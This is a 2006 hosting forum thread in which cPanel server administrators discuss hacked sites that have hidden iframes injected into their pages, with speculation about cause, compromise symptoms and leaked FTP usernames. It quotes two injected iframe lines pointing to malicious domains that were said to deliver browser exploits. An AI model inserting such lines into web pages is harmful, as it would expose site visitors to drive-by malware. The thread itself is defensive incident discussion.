#1 (permalink)  
Old 11-30-2006, 09:08 AM
cPanel Partner NOC
cPanel Partner NOC Badge
 
Join Date: Dec 2004
Posts: 376
forlinuxsupport is on a distinguished road
Angry stelaartois.ru - cpanel server hacked ?

Hi

I have foudn thsi on one of my cpanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all CPANEL servers.

I have inserted spaces in the words , in case someone clicks on it

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the servr down.. some type of doss attack when running it ?

Anyone else had this issue. I'm busy investigating it, so I will post back here is I find anything.

Just found out, one server chnaged the root password and that stopped them getting on. I looked in logs and cant find anyone sshing on.. hmm... puzzling.

Regards
Andy
__________________
www.Forlinux.co.uk
Linux Hosting & Support solutions
Please note the information given is intended as advice only.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #2 (permalink)  
Old 11-30-2006, 09:43 AM
Registered User
 
Join Date: Nov 2006
Location: Lithuania
Posts: 122
Kelmas is on a distinguished road
That is an explot that hit many HostGator servers some time ago and that iframe contained a serious virus. I suggest backing up /home/ dirs and reinstall servers.

The problem is in PHP rendering (automatically ads iframe to all generated pages) and spreads due to IE exploit. Other browsers does not show this.
__________________
Gytis Repecka aka Kelmas
NFS Tuning / AutoNews.lt webmaster, IT journalist
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #3 (permalink)  
Old 11-30-2006, 09:44 AM
cPanel Partner NOC
cPanel Partner NOC Badge
 
Join Date: Dec 2004
Posts: 376
forlinuxsupport is on a distinguished road
Unhappy

Hey guys

I know the exploit you are talking about and I ran the cpanel script and did the force update when that happened (about a month or so ago).

So I'm puzzled as to how they are able to do it now...

I'm hoping its not a new cpanel exploit. apache Logs have rotated (nice one cpanel) so I cant even look back in those.

Regards
Andy
__________________
www.Forlinux.co.uk
Linux Hosting & Support solutions
Please note the information given is intended as advice only.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #4 (permalink)  
Old 11-30-2006, 09:47 AM
AndyReed's Avatar
cPanel Partner NOC
cPanel Partner NOC Badge
 
Join Date: May 2004
Location: Minneapolis, MN
Posts: 2,212
AndyReed is on a distinguished road
Quote:
Originally Posted by forlinuxsupport View Post
I have found this on one of my cpanel servers and googling it has come up with 2 other servers it has happened on. One of the common things is they are all CPANEL servers.

I have inserted spaces in the words , in case someone clicks on it

< I F R A M E name='StatPage' src='h t t p : / / s t e l a a r t o i s . r u /index2.php' w i d t h=5 h e i g h t=5
s t y l e='display:none'></IFRAME>

It seems to really slow the servr down.. some type of doss attack when running it ?

Anyone else had this issue. I'm busy investigating it, so I will post back here is I find anything.

Just found out, one server chnaged the root password and that stopped them getting on. I looked in logs and cant find anyone sshing on.. hmm... puzzling.
Just in case, these are few of the symptoms of a server that has been compromised:
  1. Applications that suddenly don't respond as expected.
  2. Additional user accounts that you can't account for (these may be made to look like system accounts)
  3. New files or directories with unusual names.
  4. Additional network traffic that can't be traced to a particular process
  5. E-Mail from a security department implying that your server has been port scanning or sending malicious network traffic
  6. Server running significantly slower

If you are experiencing any of these symptoms, your server has been compromised and the best solution is OS reload.
__________________
Andy Reed
ServerTune.com
Dedicated server hosting, Colocation Services, Server Management, and cPanel Licenses
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #5 (permalink)  
Old 12-01-2006, 04:34 PM
AndyReed's Avatar
cPanel Partner NOC
cPanel Partner NOC Badge
 
Join Date: May 2004
Location: Minneapolis, MN
Posts: 2,212
AndyReed is on a distinguished road
Quote:
Originally Posted by forlinuxsupport View Post
I'm hoping its not a new cpanel exploit.
Is it cPanel exploit???
__________________
Andy Reed
ServerTune.com
Dedicated server hosting, Colocation Services, Server Management, and cPanel Licenses
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #6 (permalink)  
Old 12-02-2006, 12:03 PM
Registered User
 
Join Date: Sep 2003
Location: UK, Luton
Posts: 197
JamesSmith
Some of our servers are suffering the same fate, despite everything being up to date. Some web sites on some servers have the following added to their index.php pages:

Code:
<iframe src="http://isecurepages.net/out.php?s_id=11" width=0 height=0></iframe>
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
__________________
Regards,
James Smith
UH Hosting Ltd
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #7 (permalink)  
Old 12-02-2006, 12:37 PM
AndyReed's Avatar
cPanel Partner NOC
cPanel Partner NOC Badge
 
Join Date: May 2004
Location: Minneapolis, MN
Posts: 2,212
AndyReed is on a distinguished road
Quote:
Originally Posted by JamesSmith View Post
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
Unless you can prove that your server was hacked because of their control panel, otherwise you don't have a case agianst them. It is in your best interest to take all measures to harden and secure your server. Remember that the cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, the cPanel is the most secure and robust control panel.
__________________
Andy Reed
ServerTune.com
Dedicated server hosting, Colocation Services, Server Management, and cPanel Licenses
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #8 (permalink)  
Old 12-02-2006, 02:37 PM
Registered User
 
Join Date: Nov 2006
Location: Lithuania
Posts: 122
Kelmas is on a distinguished road
Quote:
Originally Posted by JamesSmith View Post
I contacted cPanel when we first noticed the problem (right at the time of the major cPanel exploit ... coincidence? I don’t think so) but they refuse to help, with the usual "we do not provide server management". What they don’t seem to grasp is that I'm not after server management, I'm after assistance with a potential problem caused by their insecure software!
You can try to search for information at HostGator Forums, guys had a hard time, but solved similar attack.
__________________
Gytis Repecka aka Kelmas
NFS Tuning / AutoNews.lt webmaster, IT journalist
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #9 (permalink)  
Old 12-02-2006, 07:59 PM
Registered User
 
Join Date: Sep 2003
Location: UK, Luton
Posts: 197
JamesSmith
Quote:
Originally Posted by AndyReed View Post
Unless you can prove that your server was hacked because of their control panel, otherwise you don't have a case agianst them. It is in your best interest to take all measures to harden and secure your server. Remember that the cPanel offers web hosting software that automates the intricate workings of web hosting servers. Compared to other control panels, the cPanel is the most secure and robust control panel.
I have no doubt that it was because of the recent cPanel exploit as its occurred and is occurring on a number of other hosts.

It will be interesting to see how this progresses and if the impact of it is felt further, maybe when more people are affected will someone take notice.
__________________
Regards,
James Smith
UH Hosting Ltd
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #10 (permalink)  
Old 12-03-2006, 04:35 AM
dfltech's Avatar
Registered User
 
Join Date: Nov 2004
Posts: 10
dfltech is on a distinguished road
I was googling and found some links that had this problem as well..

Now what concerned me was they all used cPanel server and they all are effected in late November. So it is definately not the last exploit.

I hope that it is not the cPanel again..!!!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #11 (permalink)  
Old 12-03-2006, 04:52 AM
Registered User
 
Join Date: Nov 2006
Location: Lithuania
Posts: 122
Kelmas is on a distinguished road
Quote:
Originally Posted by dfltech View Post
Now what concerned me was they all used cPanel server and they all are effected in late November. So it is definately not the last exploit.
Actually late September.
__________________
Gytis Repecka aka Kelmas
NFS Tuning / AutoNews.lt webmaster, IT journalist
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #12 (permalink)  
Old 12-03-2006, 05:02 AM
Registered User
 
Join Date: Sep 2003
Location: UK, Luton
Posts: 197
JamesSmith
isecurepage code started to appear for us about a week before the cPanel exploit was announced by cPanel.

I think we need some clarification from hostgator if their problem was the same and the line of code that was added to peoples sites - If we can see a pattern, then there’s still a problem that cPanel needs to do something about.

The problem is, we dont know how this line of code is being added to sites.
__________________
Regards,
James Smith
UH Hosting Ltd
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #13 (permalink)  
Old 12-03-2006, 05:18 AM
Registered User
 
Join Date: Nov 2006
Location: Lithuania
Posts: 122
Kelmas is on a distinguished road
Quote:
Originally Posted by JamesSmith View Post
The problem is, we dont know how this line of code is being added to sites.
As in Hostgator's issue, these lines were added by infected PHP engine during page rendering.
__________________
Gytis Repecka aka Kelmas
NFS Tuning / AutoNews.lt webmaster, IT journalist
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #14 (permalink)  
Old 12-04-2006, 06:55 AM
cPanel Partner NOC
cPanel Partner NOC Badge
 
Join Date: Dec 2004
Posts: 376
forlinuxsupport is on a distinguished road
Wink

yes.. got it

They had guessed 3 users ftp usernames and passwords on the server.

Not sure how they would get those usernames.

The ip he came from was - 209.160.65.6

The usernames were.. so not easy to guess
lookwhat
paulslee
yeschef

I'm wondering if there is more too this.. and how they got thoese detials ...

Might have exploited the server earlier and downloaded all usernames and passwords..

Cheers
Andy
__________________
www.Forlinux.co.uk
Linux Hosting & Support solutions
Please note the information given is intended as advice only.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
  #15 (permalink)  
Old 12-04-2006, 09:30 AM
dfltech's Avatar
Registered User
 
Join Date: Nov 2004
Posts: 10
dfltech is on a distinguished road
Quote:
Originally Posted by Kelmas View Post
Actually late September.
No its late November... and by the way I have a friend whos site had the same iframe hack yesterday.. now he has a VPS with very few sites and cPanel.. but all other sites were intact.. So this should not have any thing to do with cPanel I suppose.

May be a PHP application or a function...

And regarding hostgator.. their issues was at the same time when cPanel had an exploit.. I have gone through their forums but did not fine any recent complains about the iframe hack.

Last edited by dfltech; 12-05-2006 at 08:02 AM.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT -5. The time now is 06:21 AM.


Powered by vBulletin® Version 3.8.2
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
© cPanel Inc